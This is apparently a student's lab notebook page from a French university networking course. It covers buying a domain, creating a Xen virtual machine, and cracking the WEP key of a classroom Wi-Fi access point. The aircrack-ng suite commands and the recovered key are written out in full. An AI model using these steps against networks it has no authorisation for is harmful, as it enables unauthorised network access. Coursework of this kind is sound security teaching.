TP sysres IMA5sc 2019/2020 G6

De Wiki d'activités IMA
Révision datée du 25 novembre 2019 à 22:38 par Bmuzakar (discussion | contributions) (cassage de la clef WEP d'un point d'accès Wifi)

1ère séance

Choix du nom de domaine

Sur le site gandi.net, j'ai acheté le nom de mon domaine qui est: blennoragie.site.

Installation de la machine virtuelle Xen

Via une connection en SSH à cordouan.insecserv.deule.net, j'ai installé l'image de la machine virtuelle Xen par la commande suivante

   xen-create-image --hostname=blennoragie --dhcp -- dir=/usr/local/xen

le paramètre hostname spécifie le nom de ma machine(blennoragie) et les disques virtuels sont stockés dans le repertoire(/usr/local/xen):


L'adresse MAC obtenue est : 00:16:3E:D6:E1:DF

2ème séance

cassage de la clef WEP d'un point d'accès Wifi

Cette partie a été réalisé sur une machine sur laquelle on a branché une clé WIFI. J'ai commencé par installé aircrack, l'outil qui me servira à cracker les différentes clefs.

je crée ensuite l'interface wlan0 avec laquelle je vais récupérer les paquets que je souhaite capturer.

Pour créer cet interface je lance la commande:

 airmon-ng start wlan0mon

Ensuite j'observe les BSSID qui circulent sur le réseau:

  airodump-ng --encrypt wep wlan0mon

Je copie les paquets qui circulent sur cracotte06 et je les sauvegardent dans mon fichier craquage.txt

  airodump-ng craquag.txt -c 2 --bssid  04:DA:D2:9C:50:55 wlan0mon

Enfin je réalise le cassage de la clef:

  aircrack-ng craquage.txt.cap

Pour décrypter la clef il a fallu capturer 30 000 paquets et testé 673 clefs ce qui aura pris 5 minutes.

     KEY FOUND! [F1:CA:C4:00:00:00:00:00:00:00:99:99:99]
     Decrypted correctly:100%

4eme seance

5ème seance

2ème séance

cassage de la clef WEP d'un point accès Wifi